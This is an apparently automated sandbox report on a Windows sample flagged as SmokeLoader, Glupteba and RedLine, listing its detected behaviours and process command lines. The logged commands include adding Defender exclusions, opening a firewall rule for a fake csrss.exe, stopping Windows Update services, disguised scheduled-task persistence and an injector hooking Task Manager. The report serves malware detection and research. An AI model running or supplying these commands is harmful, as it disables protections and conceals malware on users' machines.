Malware Analysis Report

2025-03-15 05:12

Sample ID 231211-dwba9ache8
Target ac026bee297cb9c7852863cb13154b84.exe
SHA256 eb8fdac6122db3911fb94887b8b56997a7eace7e65158d681906f194bfe3979d
Tags
smokeloader glupteba redline @oleh_ps livetraffic up3 backdoor discovery dropper evasion infostealer loader spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Threat Level: Known bad

The file ac026bee297cb9c7852863cb13154b84.exe was found to be: Known bad.

Malicious Activity Summary

RedLine

SmokeLoader

Glupteba payload

Smokeloader family

Glupteba

RedLine payload

Stops running service(s)

Modifies Windows Firewall

Downloads MZ/PE file

Deletes itself

Executes dropped EXE

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Launches sc.exe

Program crash

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Runs net.exe

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-11 03:21

Signatures

Smokeloader family

smokeloader

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-11 03:21

Reported

2023-12-11 03:23

Platform

win7-20231023-en

Max time kernel

115s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

RedLine

infostealer redline

RedLine payload

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Deletes itself

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\977F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7A4F.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\977F.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1272 wrote to memory of 3028 N/A N/A C:\Users\Admin\AppData\Local\Temp\977F.exe
PID 1272 wrote to memory of 3028 N/A N/A C:\Users\Admin\AppData\Local\Temp\977F.exe
PID 1272 wrote to memory of 3028 N/A N/A C:\Users\Admin\AppData\Local\Temp\977F.exe
PID 1272 wrote to memory of 3028 N/A N/A C:\Users\Admin\AppData\Local\Temp\977F.exe
PID 1272 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\7A4F.exe
PID 1272 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\7A4F.exe
PID 1272 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\7A4F.exe
PID 1272 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\7A4F.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe

"C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe"

C:\Users\Admin\AppData\Local\Temp\977F.exe

C:\Users\Admin\AppData\Local\Temp\977F.exe

C:\Users\Admin\AppData\Local\Temp\7A4F.exe

C:\Users\Admin\AppData\Local\Temp\7A4F.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\8123.exe

C:\Users\Admin\AppData\Local\Temp\8123.exe

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\is-MPON2.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-MPON2.tmp\tuc3.tmp" /SL5="$A0116,8423542,54272,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231211032233.log C:\Windows\Logs\CBS\CbsPersist_20231211032233.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\EACF.bat" "

C:\Users\Admin\AppData\Local\Temp\F442.exe

C:\Users\Admin\AppData\Local\Temp\F442.exe

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\FAC8.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

Network

Files

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-11 03:21

Reported

2023-12-11 03:23

Platform

win10v2004-20231130-en

Max time kernel

98s

Max time network

100s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\A43F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C55F.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3324 wrote to memory of 232 N/A N/A C:\Users\Admin\AppData\Local\Temp\A43F.exe
PID 3324 wrote to memory of 232 N/A N/A C:\Users\Admin\AppData\Local\Temp\A43F.exe
PID 3324 wrote to memory of 232 N/A N/A C:\Users\Admin\AppData\Local\Temp\A43F.exe
PID 3324 wrote to memory of 4572 N/A N/A C:\Users\Admin\AppData\Local\Temp\C55F.exe
PID 3324 wrote to memory of 4572 N/A N/A C:\Users\Admin\AppData\Local\Temp\C55F.exe
PID 3324 wrote to memory of 4572 N/A N/A C:\Users\Admin\AppData\Local\Temp\C55F.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe

"C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe"

C:\Users\Admin\AppData\Local\Temp\A43F.exe

C:\Users\Admin\AppData\Local\Temp\A43F.exe

C:\Users\Admin\AppData\Local\Temp\C55F.exe

C:\Users\Admin\AppData\Local\Temp\C55F.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Program Files (x86)\xrecode3\xrecode3.exe

"C:\Program Files (x86)\xrecode3\xrecode3.exe" -i

C:\Program Files (x86)\xrecode3\xrecode3.exe

"C:\Program Files (x86)\xrecode3\xrecode3.exe" -s

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 1

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 1

C:\Users\Admin\AppData\Local\Temp\is-34MKO.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-34MKO.tmp\tuc3.tmp" /SL5="$7005E,8423542,54272,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\C8BC.exe

C:\Users\Admin\AppData\Local\Temp\C8BC.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1140 -ip 1140

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 332

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\3467.exe

C:\Users\Admin\AppData\Local\Temp\3467.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\55AC.bat" "

Network


Files

SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155